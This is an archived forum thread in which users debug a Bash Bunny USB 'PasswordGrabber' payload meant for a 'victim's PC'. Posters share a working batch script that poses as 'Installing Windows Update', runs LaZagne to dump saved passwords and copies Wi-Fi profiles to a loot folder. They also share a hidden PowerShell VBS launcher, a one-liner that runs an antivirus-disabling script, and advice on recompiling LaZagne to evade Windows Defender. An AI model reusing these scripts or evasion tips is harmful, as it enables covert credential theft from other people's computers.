Cech Posted November 16, 2017 Share Posted November 16, 2017 Hey guys, I've recently bought Bash Bunny and I've tried to set PasswordGrabber on Switch2, I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md), once I switch it from arming mode to switch2 (attack mode) and I place it into a victim's PC (test pc) on windows 10, the green LED starts to flash within few seconds (which probably means to remove it right?) Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong? Thank you in advance guys Link to comment Share on other sites More sharing options...
qdba Posted November 22, 2017 Share Posted November 22, 2017 Maybe an VirusScanner lazagne.exe was mostly catched by AV. Link to comment Share on other sites More sharing options...
Struthian Posted November 25, 2017 Share Posted November 25, 2017 The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory. Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on latest windows 10. If the Virus scanner blocked Lazagna, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration I am continuing to investigate and improve this payload. Following is for illustration, actual e.cmd is attached. @echo off @echo Installing Windows Update setlocal cd /d %~dp0 REM Time and Date set drec=%COMPUTERNAME%_%date%_%TIME: =0% REM make drec a legit filename. set drec=%drec: =_% set drec=%drec::=% set drec=%drec:/=_% set drec=%drec:.=_% set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% mkdir %dst% >>nul REM This executes LaZagne in the current directory and outputs the password file to Loot REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" %~dp0\laZagne.exe all -v > "%dst%\passwords.txt" if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit e.cmd Link to comment Share on other sites More sharing options...
Clean_Focus Posted December 3, 2017 Share Posted December 3, 2017 Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing. i.vbs Set objShell = CreateObject("WScript.Shell") strPath = Wscript.ScriptFullName Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.GetFile(strPath) strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd" objShell.Run strFolder and then just remove %~dp0\e.cmd from d.cmd Link to comment Share on other sites More sharing options...
Am3ience Posted February 21, 2018 Share Posted February 21, 2018 isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe Link to comment Share on other sites More sharing options...
C1PH3R Posted February 21, 2018 Share Posted February 21, 2018 14 hours ago, Am3ience said: isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe You could paste a little piece of code before that that disables the av: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')" That was the code and then you need this file: https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1 Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted February 21, 2018 Share Posted February 21, 2018 I haven't tested yet to see if "Set-MpPreference" affects all AV on the machine (like AVAST) or just Windows Defender. Link to comment Share on other sites More sharing options...
Am3ience Posted February 21, 2018 Share Posted February 21, 2018 1 hour ago, C1PH3R said: You could paste a little piece of code before that that disables the av: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')" That was the code and then you need this file: https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1 I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared. Link to comment Share on other sites More sharing options...
C1PH3R Posted February 22, 2018 Share Posted February 22, 2018 21 hours ago, Am3ience said: I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared. Huh, that is strange. Link to comment Share on other sites More sharing options...
RazerBlade Posted February 22, 2018 Share Posted February 22, 2018 Windows defender removes it. Link to comment Share on other sites More sharing options...
Spoonman Posted April 16, 2018 Share Posted April 16, 2018 On 2018-02-22 at 11:35 AM, RazerBlade said: Windows defender removes it. Yea, windows defender needs to be turned off, I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible Link to comment Share on other sites More sharing options...
RazerBlade Posted April 17, 2018 Share Posted April 17, 2018 12 hours ago, Spoonman said: Yea, windows defender needs to be turned off, I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible A better would be to compile the code yourself and add a couple of comments to change the file signature. Link to comment Share on other sites More sharing options...
Naked_eye Posted April 30, 2018 Share Posted April 30, 2018 I have been playing with Python for hours trying to figure out how to compile this. It can't be that complicated. I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors. Is there an ealier version of Pythin or somewhere that gives compile instructions? Link to comment Share on other sites More sharing options...
Naked_eye Posted May 1, 2018 Share Posted May 1, 2018 On 4/17/2018 at 4:31 AM, RazerBlade said: A better would be to compile the code yourself and add a couple of comments to change the file signature. I figured it out following these instructions https://github.com/AlessandroZ/LaZagne/wiki/How-to-compile Thanks! Link to comment Share on other sites More sharing options...
DennisVeninga Posted May 11, 2018 Share Posted May 11, 2018 I've modified this payload for disabling Windows Defender (only) and activating again after finishing. https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2 Link to comment Share on other sites More sharing options...
Garcik Posted May 11, 2018 Share Posted May 11, 2018 2 hours ago, DennisVeninga said: I've modified this payload for disabling Windows Defender (only) and activating again after finishing. https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2 I have done that you say and it doesn't work for. Why? I am new at this, help Link to comment Share on other sites More sharing options...
Lycianus Posted May 28, 2018 Share Posted May 28, 2018 On 11/25/2017 at 5:50 PM, Struthian said: The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory. Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on latest windows 10. If the Virus scanner blocked Lazagna, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration I am continuing to investigate and improve this payload. Following is for illustration, actual e.cmd is attached. @echo off @echo Installing Windows Update setlocal cd /d %~dp0 REM Time and Date set drec=%COMPUTERNAME%_%date%_%TIME: =0% REM make drec a legit filename. set drec=%drec: =_% set drec=%drec::=% set drec=%drec:/=_% set drec=%drec:.=_% set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% mkdir %dst% >>nul REM This executes LaZagne in the current directory and outputs the password file to Loot REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" %~dp0\laZagne.exe all -v > "%dst%\passwords.txt" if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit e.cmd Hello you ahve function USB_Exfiltration and PasswordGrabber ? could you share the files please? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.